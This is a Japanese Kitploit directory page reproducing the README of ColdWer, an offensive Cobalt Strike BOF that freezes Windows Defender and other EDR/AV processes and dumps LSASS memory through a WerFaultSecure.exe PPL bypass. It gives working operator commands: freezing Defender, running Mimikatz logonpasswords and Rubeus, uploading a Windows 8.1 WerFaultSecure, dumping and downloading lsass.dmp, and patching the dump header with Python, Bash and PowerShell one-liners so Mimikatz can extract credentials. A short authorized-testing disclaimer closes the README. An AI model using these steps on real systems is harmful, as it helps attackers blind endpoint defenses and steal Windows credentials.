Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ColdWer — Cobalt Strike BOFでEDR/AVプロセスをフリーズし、WerFaultSecure.exeのPPLバイパスを使用してLSASSをダンプする | Kitploit
ツール/GitHubGitHub/0xsh3llf1r3/coldwer
特権昇格エクスプロイト横移動ポストエクスプロイトレッドチーミングペイロード開発
GitHub0xsh3llf1r3/coldwer

ColdWer

Cobalt Strike BOFでEDR/AVプロセスをフリーズし、WerFaultSecure.exeのPPLバイパスを使用してLSASSをダンプする

リポジトリを見る
144236ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ColdWer
エンドポイントでの冷戦。

Stars Forks License


🥶 ColdWer

ColdWer は、WerFaultSecure.exe の PPL バイパスを利用して、最新の Windows システム上の EDR/AV プロセスをフリーズし、LSASS メモリをダンプします。

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

EDR/AV をフリーズせよ。必要なものを抽出せよ。冷たくあれ。


👤 作者

Sh3llf1r3 (@0xsh3llf1r3)


🙏 クレジット

このプロジェクトは TwoSevenOneT (@TwoSevenOneT) の研究に基づいています:

プロジェクト説明
EDR-Freezeオリジナルの EDR フリーズ手法
WSASSWerFaultSecure 経由の LSASS ダンプ

基礎となる手法のすべてのクレジットは TwoSevenOneT に帰属します。


🔥 機能


🚀 始め方

📋 前提条件

  • Cobalt Strike 4.x
  • 高整合性ビーコン(管理者/SYSTEM)

💾 インストール

  1. リポジトリをクローン:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Cobalt Strike にアグレッサースクリプトをロード:
  • Cobalt Strike → Script Manager へ移動
  • Load をクリック
  • cw/coldwer.cna を選択

📦 ソースからのビルド

root@kitploit:~
# ソースディレクトリへ移動
cd src/

# BOF をコンパイル(MinGW が必要)
make

# または手動:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 クイックダウンロード

  1. Releases へ移動
  2. coldwer.o と coldwer.cna をダウンロード
  3. 両方を同じフォルダに配置
  4. Cobalt Strike で coldwer.cna をロード

🖥️ 使い方

❄️ EDR/AV をフリーズ

root@kitploit:~
# Windows Defender の PID を探す
beacon> ps

# プロセスをフリーズ
beacon> cw-freeze 1337

# EDR/AV がフリーズされた状態でコマンドを実行
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# 終わったらアンフリーズ
beacon> cw-unfreeze

🔓 LSASS をダンプ

root@kitploit:~

# ステップ 1: Win8.1 の WerFaultSecure.exe をアップロード
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# ステップ 2: LSASS の PID を探す
beacon> ps

# ステップ 3: LSASS をダンプ
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# ステップ 4: ダンプファイルをダウンロード
beacon> download C:\Windows\Temp\lsass.dmp

🔧 ダウンロード後

ファイルヘッダーを変更し、ミニダンプ形式を復元します:

元の状態 (PNG)変更後 (MDMP)
89 50 4E 474D 44 4D 50

ヘッダー復元コマンド:

方法コマンド
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

その後 Mimikatz で解析:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 コマンド

コマンド説明
cw-freeze <PID> [Path]プロセスをフリーズ
cw-unfreeze以前フリーズしたプロセスをアンフリーズ
cw-dump <PID> <Path>LSASS メモリをダンプ

📝 例

root@kitploit:~
# デフォルトパスでフリーズ
beacon> cw-freeze 1337

# カスタムの WerFaultSecure.exe を使用
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# LSASS をダンプ
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# 終わったらアンフリーズ
beacon> cw-unfreeze

✅ 対応ターゲット

ターゲット状態
Windows Defender (MsMpEng.exe)✅ 動作
LSASS (lsass.exe)✅ 動作
その他の PPL プロセス✅ 動作

⚠️ 制限事項

カーネルモードの自己保護機能を持つ EDR では動作しません:

EDR状態
Elastic Endpoint❌ ブロック
CrowdStrike Falcon❌ ブロック
SentinelOne❌ ブロック
Carbon Black❌ ブロック

⚙️ 動作の仕組み

root@kitploit:~
1. 🚀 WerFaultSecure.exe を PPL(WinTcb レベル)として起動
                    ↓
2. 🎯 WerFaultSecure がターゲットプロセスにアタッチ
                    ↓
3. ⏸️  MiniDumpWriteDump がターゲットの全スレッドを一時停止
                    ↓
4. 🥶 WerFaultSecure 自体を一時停止 → ターゲットはフリーズ状態を維持
                    ↓
5. ✅ コマンドを実行(EDR/AV は見えない!)
                    ↓
6. 🔥 WerFaultSecure を終了 → ターゲットがアンフリーズ

🔑 なぜ Win8.1 の WerFaultSecure か?

バージョン出力
Windows 10/11暗号化ダンプのみ
Windows 8.1未加工の暗号化されていないダンプ

🔍 トラブルシューティング


⚖️ 免責事項

root@kitploit:~
⚠️ 許可されたセキュリティテストのみ

このツールは以下の用途を目的としています:
- 許可されたペネトレーションテスト
- 書面による許可を得たレッドチーム運用
- 管理された環境でのセキュリティ研究

作者は本ツールの誤用またはそれによって生じたいかなる損害についても責任を負いません。
コンピュータシステムへの不正アクセスは違法です。

📜 ライセンス

MIT ライセンス - LICENSE を参照


🥶 冷たく、静かに。🥶

⭐ このリポジトリが役に立ったらスターを付けてください! ⭐

ツールをダウンロード
機能説明
❄️ フリーズEDR/AV プロセスを昏睡状態にする
🔓 ダンプPPL をバイパスして LSASS メモリを抽出
🛡️ PPL バイパスWerFaultSecure.exe を WinTcb レベルで活用
⚡ 高速インライン BOF 実行
🎯 手動制御フリーズとアンフリーズのタイミングを自分で決められる
エラー原因解決方法
ファイルが見つかりませんパスが無効WerFaultSecure.exe のパスを確認
アクセスが拒否されました低い権限管理者/SYSTEM として実行
署名が無効署名なしバイナリ適切に署名された WerFaultSecure.exe を使用
プロセスが存在しませんPID が間違っているps コマンドで PID を確認
ターゲットが保護されていますカーネル保護EDR が自己保護機能を持っている(バイパス不可)
すでにフリーズされています状態が停止最初に cw-unfreeze を実行